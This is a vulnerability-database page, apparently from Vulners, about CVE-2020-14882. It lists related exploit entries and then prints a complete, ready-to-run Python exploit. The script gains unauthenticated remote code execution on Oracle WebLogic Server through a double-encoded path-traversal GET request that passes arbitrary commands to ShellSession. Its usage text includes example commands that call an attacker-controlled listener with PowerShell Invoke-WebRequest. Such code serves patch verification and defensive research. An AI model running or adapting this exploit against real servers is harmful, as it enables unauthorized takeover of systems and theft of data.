Oracle WebLogic Server Remote Code Execution via Unauthenticated GET reques
Reporter | Title | Published | Views | Family All 78 |
---|---|---|---|---|
![]() | CVE-2020-14882 | 21 Oct 202014:04 | – | cvelist |
![]() | Exploit for CVE-2020-14882 | 29 Oct 202015:44 | – | githubexploit |
![]() | Exploit for CVE-2020-14882 | 1 Nov 202013:12 | – | githubexploit |
![]() | Exploit for CVE-2020-14882 | 10 May 202121:32 | – | githubexploit |
![]() | Exploit for CVE-2020-14882 | 25 Feb 202112:57 | – | githubexploit |
![]() | Exploit for CVE-2020-14882 | 9 Nov 202008:03 | – | githubexploit |
![]() | Exploit for CVE-2020-14882 | 28 Oct 202021:28 | – | githubexploit |
![]() | Exploit for CVE-2020-14882 | 31 Oct 202001:43 | – | githubexploit |
![]() | Exploit for CVE-2020-14882 | 4 Nov 202003:09 | – | githubexploit |
![]() | Exploit for CVE-2020-14882 | 29 Oct 202013:53 | – | githubexploit |
`#!/usr/bin/python3
# Exploit Title: Oracle WebLogic Server 10.3.6.0.0 / 12.1.3.0.0 / 12.2.1.3.0 / 12.2.1.4.0 / 14.1.1.0.0 - Unauthenticated RCE via GET request
# Exploit Author: Nguyen Jang
# CVE: CVE-2020-14882
# Vendor Homepage: https://www.oracle.com/middleware/technologies/weblogic.html
# Software Link: https://www.oracle.com/technetwork/middleware/downloads/index.html
# More Info: https://testbnull.medium.com/weblogic-rce-by-only-one-get-request-cve-2020-14882-analysis-6e4b09981dbf
import requests
import sys
from urllib3.exceptions import InsecureRequestWarning
if len(sys.argv) != 3:
print("[+] WebLogic Unauthenticated RCE via GET request")
print("[+] Usage : python3 exploit.py http(s)://target:7001 command")
print("[+] Example1 : python3 exploit.py http(s)://target:7001 \"nslookup your_Domain\"")
print("[+] Example2 : python3 exploit.py http(s)://target:7001 \"powershell.exe -c Invoke-WebRequest -Uri http://your_listener\"")
exit()
target = sys.argv[1]
command = sys.argv[2]
request = requests.session()
headers = {'Content-type': 'application/x-www-form-urlencoded; charset=utf-8'}
print("[+] Sending GET Request ....")
GET_Request = request.get(target + "/console/images/%252E%252E%252Fconsole.portal?_nfpb=false&_pageLable=&handle=com.tangosol.coherence.mvel2.sh.ShellSession(\"java.lang.Runtime.getRuntime().exec('" + command + "');\");", verify=False, headers=headers)
print("[+] Done !!")
`
Transform Your Security Services
Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.
Book a live demo